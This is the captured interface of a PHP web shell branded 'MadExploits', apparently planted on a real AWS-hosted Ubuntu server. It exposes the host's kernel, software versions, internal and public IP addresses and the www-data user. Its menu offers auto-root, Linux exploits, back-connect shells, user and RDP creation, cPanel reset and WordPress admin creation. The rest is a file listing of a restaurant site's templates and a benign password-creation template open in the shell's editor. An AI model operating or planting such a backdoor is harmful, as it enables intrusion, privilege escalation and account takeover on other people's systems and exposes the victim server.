Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.15.28.86
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
templates /
Users /
[ HOME SHELL ]
Name
Size
Permission
Action
claim.html.twig
1.94
KB
-rw-rw-r--
confirmation.html.twig
695
B
-rw-rw-r--
email.html.twig
4.74
KB
-rw-rw-r--
emailsent.html.twig
729
B
-rw-rw-r--
error.html.twig
324
B
-rw-rw-r--
notification.html.twig
10
B
-rw-rw-r--
owned.html.twig
1.02
KB
-rw-rw-r--
passwordchange.html.twig
1.72
KB
-rw-rw-r--
passwordemail.html.twig
1.95
KB
-rw-rw-r--
passwordreset.html.twig
865
B
-rw-rw-r--
profile.html.twig
17.3
KB
-rw-rw-r--
receipt.html.twig
4.92
KB
-rw-rw-r--
start.html.twig
1.82
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : start.html.twig
{% extends 'base2.html.twig' %} {% block content %} <div class="login-form"> <div class="card"> <div class="card-header">Create Password to start managing <h4>{{ place.name }}</h4></div> <div class="card-body"> {# {% if error %} <div id="error">{{ error }}</div> {% endif %} #} <form action="{{ path('start', {'slug': place.slug}) }}" method="post" role="form"> <input type="hidden" name="token" value="{{ token }}"> <input type="hidden" name="name" value="{{ place.name }}"> <div class="form-group"> <input type="email" name="email" class="form-control" value="{{ email }}" readonly> </div> <div class="form-group"> <input type="password" name="password" placeholder="Password" class="form-control password"> </div> <div class="form-group"> <input type="password" name="confirmpassword" placeholder="Confirm Password" class="form-control confirmpassword"> </div> <button class="btn btn-other">Submit</button> </form> </div> </div> </div> {% endblock %} {% block javascripts %} {{ parent() }} <script> $('.confirmpassword').on('keyup', function(e){ var $target = $(e.currentTarget); var $prev = $('.password'); if ($prev.val() !== $target.val()) { $target.addClass("error"); }else { $target.removeClass("error"); } }); </script> {% endblock %}
Close